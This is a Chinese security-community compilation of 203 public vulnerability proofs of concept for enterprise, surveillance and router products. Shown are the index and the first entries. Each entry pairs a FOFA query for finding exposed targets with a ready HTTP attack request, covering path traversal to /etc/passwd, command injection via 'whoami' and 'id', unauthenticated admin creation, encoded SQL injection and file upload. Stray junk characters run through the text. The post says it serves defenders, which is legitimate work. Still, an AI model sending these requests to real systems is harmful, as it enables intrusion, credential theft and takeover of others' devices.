互联网公开漏洞整理202309-202406
& @9 }: Z: d$ \/ I道一安全 2024-06-05 07:41 北京: o" V. E- h& ~6 J- R# H, L1 N: H8 @
以下文章来源于网络安全新视界 ,作者网络安全新视界
& I% \3 X9 H, U9 k. r" k
3 \* @9 A( j1 Y* y9 e发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
: S" v; y8 z2 M2 t& f# D( }1 u: _! q( z/ p& o
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
. H' p2 R+ D9 ^7 c U5 H& S I7 {
& R2 R- a; N# T/ K安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。9 x0 s, B S' y6 h- j% ^
! B6 b8 I2 u1 [6 Y
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
7 K; T4 d+ I# A6 l) y% X1 ]$ D( D9 h, L( w
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。- `2 K$ e5 Q1 i9 R1 x7 S' p3 h
$ a/ x& Y6 u* l9 [4 j, D
' O, _% e) f* I声明' ~4 Z' W3 V2 |. a# ~% l
! Y j8 B3 [3 W( K' J
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
7 n' R" h+ N$ G; R# \
, r7 E; H9 p# o% X* L2 k. q. }1 ]有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
/ w( q6 M" n, z q& y9 B% Q2 f8 s. k. C6 k: h- m
, @$ i7 N* L9 Q4 K3 Y& ^& S
' w$ o+ J. Y# r3 h. v# N- f) w; P
目录
! J D8 C p$ U: z( M3 k0 A/ g6 R1 Z" `/ H7 L
01
' ?: @- J, \1 i( C4 a* `% {
+ f% A; E) E7 P- l% G9 i) P1 u1. StarRocks MPP数据库未授权访问2 y+ T6 r6 b5 a& U: X
2. Casdoor系统static任意文件读取
# f2 j8 j& T1 q" W7 y3. EasyCVR智能边缘网关 userlist 信息泄漏9 {& E+ B- j4 t( S- K
4. EasyCVR视频管理平台存在任意用户添加* O3 w8 { j Y' K
5. NUUO NVR 视频存储管理设备远程命令执行
2 m( X4 t. M+ y; c# e; u* [1 N7 o+ L6. 深信服 NGAF 任意文件读取8 m2 |- i7 } B1 U
7. 鸿运主动安全监控云平台任意文件下载# |8 j6 q" J0 e
8. 斐讯 Phicomm 路由器RCE. N- D$ y; @9 r% {' l. n
9. 稻壳CMS keyword 未授权SQL注入
) f1 j- h4 w5 j" s# C2 T0 Q10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
0 T1 k: H; p- X11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
# @ b# O- G- H! u( L9 h# b12. Jorani < 1.0.2 远程命令执行0 F3 m1 e0 ? `) Q
13. 红帆iOffice ioFileDown任意文件读取
* \9 B" z9 F" F6 P4 V4 R a4 ^14. 华夏ERP(jshERP)敏感信息泄露( h& u- ?# x u7 L& T
15. 华夏ERP getAllList信息泄露3 i( W8 E) b2 Z
16. 红帆HFOffice医微云SQL注入; q+ F& a& N3 w; A3 S
17. 大华 DSS itcBulletin SQL 注入
8 ~9 T: q& a1 E/ k( _7 O; ]18. 大华 DSS 数字监控系统 user_edit.action 信息泄露! Q1 y" l+ l3 l3 g, F" x
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
9 E! ]+ ~6 \5 B" b! E+ b20. 大华ICC智能物联综合管理平台任意文件读取
. P0 j6 X! c7 h9 r21. 大华ICC智能物联综合管理平台random远程代码执行
( ]+ V9 [$ m) g. S0 s22. 大华ICC智能物联综合管理平台 log4j远程代码执行6 w2 \" D1 B+ ^; g, L
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
, i8 x" N% e* c, W24. 用友NC 6.5 accept.jsp任意文件上传
3 v p' s, S$ ?0 }% j* z25. 用友NC registerServlet JNDI 远程代码执行3 e9 [& \ j# A- z( L" Y$ `
26. 用友NC linkVoucher SQL注入: T r x) \6 A3 m; L# E" q
27. 用友 NC showcontent SQL注入6 J ]9 p: g* a D( c R) e
28. 用友NC grouptemplet 任意文件上传
& `4 j. Z9 Y' W F29. 用友NC down/bill SQL注入' v7 m; f5 F* s4 u' c: _) p
30. 用友NC importPml SQL注入. E1 k* c' o- s/ z' z
31. 用友NC runStateServlet SQL注入
* f5 q2 r+ |7 ]0 s( {& S* f- V% ~32. 用友NC complainbilldetail SQL注入
0 b7 d4 O3 W- O7 D- c/ [) W S33. 用友NC downTax/download SQL注入; _: F3 }7 H2 W* w' b+ j; U7 C
34. 用友NC warningDetailInfo接口SQL注入
' R t$ @% A3 n8 v# L" c35. 用友NC-Cloud importhttpscer任意文件上传( N- c% y9 }7 j5 |$ L
36. 用友NC-Cloud soapFormat XXE# W+ y7 s( B& }* k4 T
37. 用友NC-Cloud IUpdateService XXE! W8 \/ h7 r. ]' O+ X
38. 用友U8 Cloud smartweb2.RPC.d XXE% c% a: d$ A6 X7 N* B( `8 a
39. 用友U8 Cloud RegisterServlet SQL注入' w) s* x( ]9 s6 D, M! e: s
40. 用友U8-Cloud XChangeServlet XXE7 v0 p% Y8 g) P# R1 ~
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
+ S0 {6 ~- U. O Y1 }2 Z2 u4 |, ^: i42. 用友GRP-U8 SmartUpload01 文件上传) S. D& i( m0 ]$ y
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
) h$ e5 S8 |9 E44. 用友GRP-U8 bx_dj_check.jsp SQL注入
% I Q! |' q) _6 V" Z45. 用友GRP-U8 ufgovbank XXE. H/ D( y( z- I6 T; r
46. 用友GRP-U8 sqcxIndex.jsp SQL注入$ w8 v* U- n% Q1 X% X
47. 用友GRP A++Cloud 政府财务云 任意文件读取
( y$ o# z8 ^6 C$ _48. 用友U8 CRM swfupload 任意文件上传
. c7 @. q4 }. Y( y% p49. 用友U8 CRM系统uploadfile.php接口任意文件上传0 i% {* @, ]9 ?9 y+ k( u3 i4 l5 m
50. QDocs Smart School 6.4.1 filterRecords SQL注入: z M& q0 u9 S( r
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
4 u Y8 t' [8 M% M8 E2 ?52. 泛微E-Office json_common.php sql注入3 {9 Y7 D9 ], ? n9 V) |2 \
53. 迪普 DPTech VPN Service 任意文件上传
% X9 [! E( A! l54. 畅捷通T+ getstorewarehousebystore 远程代码执行
# r5 u8 b' h" L8 X4 g55. 畅捷通T+ getdecallusers信息泄露6 z% R1 M" T% y8 x% J; N- g
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
# w/ \$ z3 h& X; Q( ~$ p57. 畅捷通T+ keyEdit.aspx SQL注入( R: X* |+ q( R
58. 畅捷通T+ KeyInfoList.aspx sql注入( |" a+ {3 b$ t) F' v0 @
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行1 E) p/ X/ X. y, r6 _7 `
60. 百卓Smart管理平台 importexport.php SQL注入
+ W9 \3 ]5 k f6 \6 Y* o I61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
( a& W$ Y l# k( i( x62. IP-guard WebServer 远程命令执行
6 n4 n" V4 ^% S. E63. IP-guard WebServer任意文件读取4 u" ?5 _0 D# h4 ]) z& ~
64. 捷诚管理信息系统CWSFinanceCommon SQL注入( s7 n8 y# [0 _5 L
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
. G- z! A" X6 V# s; S& \- j66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入5 C- r+ X7 a& G# Z- u! _! h
67. 万户ezOFFICE wpsservlet任意文件上传+ P8 h& i) g% [# z4 o
68. 万户ezOFFICE wf_printnum.jsp SQL注入" ^5 ~" ~8 {) O2 ~/ `
69. 万户 ezOFFICE contract_gd.jsp SQL注入
. ^6 W* v6 U, I. e8 n) A70. 万户ezEIP success 命令执行
+ w# p0 B# U( S/ H( h9 A: N0 e71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
. G: W. I a8 m# h( B, Q7 z# B# G72. 致远OA getAjaxDataServlet XXE
$ n7 @, W. A/ `5 l$ t73. GeoServer wms远程代码执行
6 [% w7 ^3 D4 v) m1 i4 O: ^5 n2 ^# X74. 致远M3-server 6_1sp1 反序列化RCE
' I8 Y: w2 X( j75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
+ Q, A6 c( x9 `0 \- d `76. 新开普掌上校园服务管理平台service.action远程命令执行4 I( S7 }6 j {
77. F22服装管理软件系统UploadHandler.ashx任意文件上传6 @: E' K }; X7 \0 n
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传8 y5 m" m% V3 i, t0 p
79. BYTEVALUE 百为流控路由器远程命令执行1 R8 T( x9 ^9 x/ v
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传/ h2 L1 c4 e) `4 G* \
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
6 M3 l/ w6 k+ K- v* Z( F/ x82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
3 e1 I# b' z+ ]0 i$ a9 ^83. JeecgBoot testConnection 远程命令执行3 B4 ^8 _, t3 b* H+ G7 [
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
- J3 m- U; O! i85. SysAid On-premise< 23.3.36远程代码执行# |: t2 E/ i* ]3 J/ Z- \+ d
86. 日本tosei自助洗衣机RCE4 K$ G. W/ u3 z2 {+ T
87. 安恒明御安全网关aaa_local_web_preview文件上传8 ?. `. e" f; u8 Y, m
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行 k! {: A( L& a Z4 d9 Y% F
89. 致远互联FE协作办公平台editflow_manager存在sql注入
; H1 J* f; n/ B0 g) M/ I0 B90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行9 [$ V3 Y( D+ {) }! U
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取6 q, U8 t8 |( o, Y4 {; N7 x8 [
92. 海康威视运行管理中心session命令执行
, w$ u) ^- ?) u5 E7 K; z93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传4 v" H/ k/ v, s$ }" ^& f
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
5 Z1 \# {5 w. [% A, m$ Y95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
% N8 a# P2 q3 e96. Apache OFBiz 18.12.11 groovy 远程代码执行8 a. }+ I6 \7 W+ j2 M2 m2 F D
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行# C& {% p. [/ g9 b( b$ x
98. SpiderFlow爬虫平台远程命令执行
; v3 E; _% T. F" f2 W, D% e99. Ncast盈可视高清智能录播系统busiFacade RCE0 o. V! e3 X# H" y2 H
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
* z. I! g8 T) g101. ivanti policy secure-22.6命令注入6 H9 @5 \2 a/ M& F+ f6 t8 }/ Z
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行& Q' i$ T) a# J9 x$ t1 p; [
103. Ivanti Pulse Connect Secure VPN XXE
- ~# a* G& G+ {" z104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露7 p4 x) G! g8 U! h: D
105. SpringBlade v3.2.0 export-user SQL 注入 |+ r2 q3 e3 n+ ~+ D
106. SpringBlade dict-biz/list SQL 注入
% l: o, n0 v& u: p107. SpringBlade tenant/list SQL 注入
- c+ w8 f' e0 I6 ?108. D-Tale 3.9.0 SSRF
5 X7 T. Q! f8 e109. Jenkins CLI 任意文件读取. X$ X* ^2 A2 M% S. w# P2 h T
110. Goanywhere MFT 未授权创建管理员$ `* l9 ^' |/ A
111. WordPress Plugin HTML5 Video Player SQL注入
" y) f9 \( B: }5 o. j- V- O112. WordPress Plugin NotificationX SQL 注入4 q4 z& i8 V9 A0 [
113. WordPress Automatic 插件任意文件下载和SSRF
. B1 T+ W; _' {114. WordPress MasterStudy LMS插件 SQL注入
7 a; @( n) V* E: p, z& f! E+ n115. WordPress Bricks Builder <= 1.9.6 RCE( O; m$ p/ \) F: o. }. ]
116. wordpress js-support-ticket文件上传
2 ]4 H8 g4 _, V: J% O; F& b |117. WordPress LayerSlider插件SQL注入% a' [/ Q& W8 X0 g
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传5 g" u2 x$ f9 u! G3 p
119. 北京百绰智能S20后台sysmanageajax.php sql注入
9 M; y2 ]& u* w4 S; P! T5 i120. 北京百绰智能S40管理平台导入web.php任意文件上传- N3 J/ k8 X+ K4 M, t# r6 |
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
u; R/ e' i3 t2 }122. 北京百绰智能s200管理平台/importexport.php sql注入
1 P" W6 ?8 a) H2 h/ P8 {, |6 w# G123. Atlassian Confluence 模板注入代码执行
/ T: c0 T* \% A& ~2 |/ O3 D124. 湖南建研工程质量检测系统任意文件上传/ d$ x; w4 v. Q, Z/ r/ c
125. ConnectWise ScreenConnect身份验证绕过
6 C" K6 X( i7 G0 L1 D126. Aiohttp 路径遍历1 u j, a5 y9 K
127. 广联达Linkworks DataExchange.ashx XXE
# n" q* g. |1 k5 y7 U* D! A128. Adobe ColdFusion 反序列化& r0 [! G2 ?8 l' C! r; L3 ?. L4 @
129. Adobe ColdFusion 任意文件读取
4 q: Q% V4 j% y% V130. Laykefu客服系统任意文件上传
3 I+ G8 I- e( ]9 I ~. @/ ^% o7 O. |$ I131. Mini-Tmall <=20231017 SQL注入; Y \7 Z% u$ s3 e7 L+ S2 X- H7 z
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过/ x- Q i. g, m6 A: `- q T& K9 p
133. H5 云商城 file.php 文件上传! w- c5 @$ ? X! m
134. 网康NS-ASG应用安全网关index.php sql注入* \/ b f4 `8 t
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
0 N' [8 [; j. Q: R136. NextChat cors SSRF
. t0 d: d6 ?& E/ K' {/ c137. 福建科立迅通信指挥调度平台down_file.php sql注入
. F+ G3 A7 V, `$ b J% L138. 福建科立讯通信指挥调度平台pwd_update.php sql注入9 m6 R7 G- P* ~; P) C
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
: d8 @% {' S& W8 G$ ^6 j1 }140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
* [/ X! s" |3 N" }+ i0 R5 V' {: B141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
# o7 j4 H- [1 D2 g) W. q142. CMSV6车辆监控平台系统中存在弱密码# Z* r1 m+ k2 C& R* i
143. Netis WF2780 v2.1.40144 远程命令执行1 e% U X) [; H6 Z5 k) f
144. D-Link nas_sharing.cgi 命令注入
, @6 _* x2 y: H# `2 O7 }) h7 g145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
: k4 ^( H' h2 u) f7 D1 a: E/ a146. MajorDoMo thumb.php 未授权远程代码执行/ V# u3 {: F: j% s8 Y0 G
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
# f; ?4 A! v2 M b5 ~/ g148. CrushFTP 认证绕过模板注入0 G a* N% v" }. \/ _- _% R
149. AJ-Report开源数据大屏存在远程命令执行
& B4 K l2 D$ C) s' I* T0 L4 z150. AJ-Report 1.4.0 认证绕过与远程代码执行
, H$ B, a1 q5 M! v" j% l8 j# {151. AJ-Report 1.4.1 pageList sql注入 L: y1 O$ K6 c9 P
152. Progress Kemp LoadMaster 远程命令执行1 |$ I5 G$ C* y" J2 Z6 W- T
153. gradio任意文件读取3 j' ]3 x% c5 R Q/ a! j
154. 天维尔消防救援作战调度平台 SQL注入6 V- |: c! V/ b& o
155. 六零导航页 file.php 任意文件上传" r/ \! O* { ^
156. TBK DVR-4104/DVR-4216 操作系统命令注入
+ K' k2 L# r, i6 ^& Y0 p4 D& _157. 美特CRM upload.jsp 任意文件上传
) \9 M0 G' E( }7 N8 d0 w' g158. Mura-CMS-processAsyncObject存在SQL注入
' S. h" G9 f# D" c; x: a2 K7 ^) |159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
: y' g0 ^8 I0 R0 D' x. _4 N160. Sonatype Nexus Repository 3目录遍历与文件读取
2 E o" Q( l* u- G% \/ n8 b161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
( Y! ~$ x& Y4 s5 `3 a2 o2 k; Z8 P! I162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
% ^( h' V' {" B163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
0 Q: T7 a* A0 ], p. a( u. I164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
* B3 ], }9 l2 V165. OrangeHRM 3.3.3 SQL 注入
% Z8 B1 }1 R) g166. 中成科信票务管理平台SeatMapHandler SQL注入1 s F5 q# m# o8 k
167. 精益价值管理系统 DownLoad.aspx任意文件读取 }5 p: h n$ W6 U0 X9 z+ M' I
168. 宏景EHR OutputCode 任意文件读取, }, m3 ~) l4 `* N
169. 宏景EHR downlawbase SQL注入+ E8 F! ^3 ]" l4 T
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
' }7 }8 W1 {* ]" d- R171. 通天星CMSV6车载定位监控平台 SQL注入
: C4 P$ Z. c) g172. DT-高清车牌识别摄像机任意文件读取" Q. P' \& j9 [7 U5 ^
173. Check Point 安全网关任意文件读取
( t7 c* I3 S( R) u174. 金和OA C6 FileDownLoad.aspx 任意文件读取, w/ N' z& _4 ^& d w, Z" p. }
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
) U: X- J# }. ^1 m176. 电信网关配置管理系统 rewrite.php 文件上传# M" i0 {! E/ |* V, C- {: j
177. H3C路由器敏感信息泄露5 i! ]+ c4 l) A1 G; W1 Q
178. H3C校园网自助服务系统-flexfileupload-任意文件上传- n5 `4 J$ l z, z }
179. 建文工程管理系统存在任意文件读取
& y2 }- o9 L9 ?180. 帮管客 CRM jiliyu SQL注入
7 o! u, I- L. i181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
! g! U2 V: A( i# _; v* V. z1 U182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
, Z# E( Y5 j3 {/ ]* p2 Y183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
8 T9 T3 Q1 S- c3 S, K& X+ u/ s' I184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加1 m7 [2 r4 D" W/ u: y' U
185. 瑞友天翼应用虚拟化系统SQL注入
. m6 Q: _$ R+ h& V. w: D186. F-logic DataCube3 SQL注入6 d* i7 ~+ y9 m2 Q
187. Mura CMS processAsyncObject SQL注入2 d* [+ `9 E5 l$ }0 c4 ?
188. 叁体-佳会视频会议 attachment 任意文件读取+ z) x4 [; a8 d8 e& J5 Q( W" L
189. 蓝网科技临床浏览系统 deleteStudy SQL注入# C8 A; b+ L4 H3 b7 F# i
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
! k ?" n/ F3 f6 e0 t* C191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
- w& }! } W5 j5 L6 r4 n' R& C192. 富通天下外贸ERP UploadEmailAttr 任意文件上传1 |7 v, o, [, \0 ~3 e& \8 E
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行/ ]9 s9 v5 O$ a. e. {1 E
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传+ G! b" U/ g) I3 l" ], ?( Y
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行! Y7 G( ?2 b% S5 X2 N/ P
196. 河南省风速科技统一认证平台密码重置
4 u# S4 e* A" z# Q! T6 m197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
0 J8 p* ~& S Z0 Z198. 阿里云盘 WebDAV 命令注入5 x- H9 y! _* J' E0 |( e$ h: Q
199. cockpit系统assetsmanager_upload接口 文件上传& ^4 b6 v, r5 z5 @) V
200. SeaCMS海洋影视管理系统dmku SQL注入9 C$ u% ?8 k( B, H
201. 方正全媒体新闻采编系统 binary SQL注入1 f! P5 F! Y" K8 q" C H
202. 微擎系统 AccountEdit任意文件上传* U. M5 O6 N- O& |
203. 红海云EHR PtFjk 文件上传. w8 @; B- y, \, N' j
! k* Z# x& G4 ` w* pPOC列表
9 y' r+ s6 H, m4 d% ^+ v
4 Y0 V) I/ Y$ W. b8 H+ M022 Q6 [6 v! _$ J
6 D* C) H* A' w2 X* x
1. StarRocks MPP数据库未授权访问6 n7 H. c- o6 ]
FOFA :title="StarRocks"
5 x2 ?9 c/ `1 y: L5 AGET /mem_tracker HTTP/1.1, }# P; D. z7 S/ T$ D
Host: URL6 T( i& k5 h: H7 c! v+ w
( j5 ~" @4 Z) z
- R# [% t( U/ p% X* L. [! b2. Casdoor系统static任意文件读取
. ^7 E8 p, j) R( AFOFA :title="Casdoor"6 @% b" P6 O5 w9 s7 @7 B
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
* @; }& [+ F: C5 U6 \, v EHost: xx.xx.xx.xx:9999& k3 n5 j8 v( w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ ~1 d3 j" A$ u) F8 MConnection: close7 G! ^0 g8 t3 r8 N4 k! {% N0 ?8 C
Accept: */*
# ^( I* y( x+ V, g# jAccept-Language: en& H4 W- u$ |8 m" f
Accept-Encoding: gzip4 n W. }, `0 w+ ^# P0 T. ^! y
7 X( T8 N }( Q. g% v1 ]; F5 y, H& h+ g& P# H+ L
3. EasyCVR智能边缘网关 userlist 信息泄漏+ i. o }; L7 {3 }
FOFA :title="EasyCVR"
: x' v+ E$ m& e: LGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
B5 l) C5 a8 b. lHost: xx.xx.xx.xx( r5 o% X. I5 k+ s, `& n% C z$ y
7 n8 k) Y) u) v, q% x& w6 C
( W# O* v& L, N6 D
4. EasyCVR视频管理平台存在任意用户添加
- j- \1 F+ p8 jFOFA :title="EasyCVR") m- v0 \$ u& K$ L
8 _6 ?+ V# S! @& P6 n0 ?password更改为自己的密码md5
" j: d6 y: p' y$ X% `- o0 BPOST /api/v1/adduser HTTP/1.1# V2 E. p. d3 `$ A2 d* W" e' L o
Host: your-ip
! P) }2 x0 ]; S" N" k4 |$ oContent-Type: application/x-www-form-urlencoded; charset=UTF-8
( V; z; s( W/ V% b0 L" X! O `3 {1 {. n( q. o# c' _
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1. w* W9 {" J5 `
8 Z2 `, p4 V; x5 ~! o! \: x
" A& U+ o7 P1 E" t5. NUUO NVR 视频存储管理设备远程命令执行" U$ o; V6 }: _3 P
FOFA:title="Network Video Recorder Login"3 G7 V1 j/ H6 ]- l, ~
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.16 x" a) c- ^0 I0 ~' c
Host: xx.xx.xx.xx& s& D! O# [2 ^, c
0 ?7 T7 z3 A: w
7 L$ h, O: ?. W2 L ?6. 深信服 NGAF 任意文件读取
4 A {; ^5 |- d8 T. e& yFOFA:title="SANGFOR | NGAF"
& ^( T- m& D% |# C, G& p+ BGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
1 q4 e' M0 G" K7 r0 h0 THost:
7 L3 c: T2 X# p% J) b
* E' _, R0 S6 `. J( C8 I; @9 P" d+ A' s4 [! g: ~8 a# D. C
7. 鸿运主动安全监控云平台任意文件下载- x1 O7 w2 Z3 C, I0 k& w! P
FOFA:body="./open/webApi.html"8 w/ h# V* @ q/ ^" c
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
: e4 e- D f& @; O- c: r9 s p) THost:
# o. ]; h# ~8 `6 _1 N+ S2 U9 r, X9 b' f) N
% _2 K: L) p8 n6 N. G. B8. 斐讯 Phicomm 路由器RCE
1 F: T- R1 v: t% r/ m! i8 ]) ?FOFA:icon_hash="-1344736688"
, J1 Y% a/ D ~3 [; {默认账号admin登录后台后,执行操作2 ~. s0 l! V# g! H( h) `
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1: ~8 w: l! f0 h- Q0 x7 E
Host: x.x.x.x! u: h7 z8 J) ]# q; l5 y
Cookie: sysauth=第一步登录获取的cookie
1 o8 a, ^/ F4 W, hContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
! _7 B' H) @' U* D3 q' @* lUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.365 p& W, t+ ]# ^7 P
' |3 q- W, t) U8 F* _3 I; |$ J9 f7 @
------WebKitFormBoundaryxbgjoytz$ f. J: m7 K, G
Content-Disposition: form-data; name="wifiRebootEnablestatus"0 A& n" L/ f# z/ z
* J! g: s5 n( x4 F$ p0 f* j% e2 [
%s
- r; \- c7 v0 ?2 S8 C------WebKitFormBoundaryxbgjoytz
" \0 o! W/ @& n: GContent-Disposition: form-data; name="wifiRebootrange"
$ h8 L: u _7 b2 Q' ~8 `1 L
4 x9 A) J$ ?* w, R: d12:00; id;( f4 b! X1 ^/ U9 ~$ R6 m
------WebKitFormBoundaryxbgjoytz- E2 e0 Q+ W0 W& A1 @# F
Content-Disposition: form-data; name="wifiRebootendrange"5 M3 i/ f1 [. v# {
) Y, [; H, D; H) }. U3 T1 W
%s:& T) ?! Z; U1 F' U; _! ?
------WebKitFormBoundaryxbgjoytz
- z$ L% L! K8 P- W+ I2 fContent-Disposition: form-data; name="cururl2"- Q0 {$ |( V/ `1 _/ \/ {. x% R2 ? Z- R
' Q0 \" f* w6 @# n# ^/ ]
5 F: N% T- u: a" O1 T, B------WebKitFormBoundaryxbgjoytz--
6 M6 w3 j" a: Q, d% d: R9 ^9 }+ O1 e& {: @* E
- d7 \& j4 o6 L- a1 G8 R! L, |
9. 稻壳CMS keyword 未授权SQL注入
( l! r% B! S- {$ z2 t5 _FOFA:app="Doccms"( D2 o0 a: N( S7 r8 W6 ?2 T
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
& z" [+ C. E) a z. JHost: x.x.x.x7 C7 ^5 Y* L4 C7 R/ @8 e- I+ p! B
$ y7 C7 Z4 _9 n1 ^4 I- z- d) O! W) S- G& `4 o9 G, D/ G
payload为下列语句的二次Url编码& b; l( K1 [3 Q9 m3 ^( \9 ?2 M
3 W) p- k$ \* }9 O
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#9 Y. h1 a# J" V& t9 }- c
' L$ d4 r- W( n% s0 e6 W10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
3 l% |( K) s. p( ]% {, ~6 gFOFA:icon_hash="953405444"' l) `; G$ F d% A2 {% i
& ~5 ]6 f* K" W
文件上传后响应中包含上传文件的路径
2 r2 V9 x F/ g# K/ dPOST /eis/service/api.aspx?action=saveImg HTTP/1.1- R8 U& b9 W1 D2 s9 `" {' q
Host: x.x.x.x:xx
1 h# B, g9 p% r$ o5 k4 s6 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
$ {, m# _. w1 uContent-Length: 1975 L$ Y* m: g% f$ ~9 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9, d+ l$ ^4 |) Y4 m E. _ d
Accept-Encoding: gzip, deflate1 w+ x# N1 e5 ?% Z' ?6 e r& ]
Accept-Language: zh-CN,zh;q=0.9
1 D1 C8 U1 f( |% N" CConnection: close
* ^; R6 a% x: R7 K4 O* S" v- NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
8 y& W( b( F& Q- c' T/ {- u
* ~& R$ W$ Y8 c) b2 p* P$ V+ g3 x------WebKitFormBoundaryxdgaqmqu: m1 D6 T: L# i9 d% C8 X# B
Content-Disposition: form-data; name="file"filename="icfitnya.txt"- ~; a( t: W$ Y) }. P" A
Content-Type: text/html1 r# Z$ u8 \6 ]2 t2 m
- q- a5 X9 @( s7 R, _jmnqjfdsupxgfidopeixbgsxbf
8 x+ P% f- m% b- G5 g- ?2 A# b6 [1 g------WebKitFormBoundaryxdgaqmqu--
3 w( n4 y3 ?# m. j0 p0 b. ~' C9 {# ^' O, H8 G8 E/ Y
1 ?9 @5 z h9 g' F/ V3 E4 b11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入! X' s1 [ G/ C/ }$ ?4 t
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"/ A+ S( z+ L% B; ~
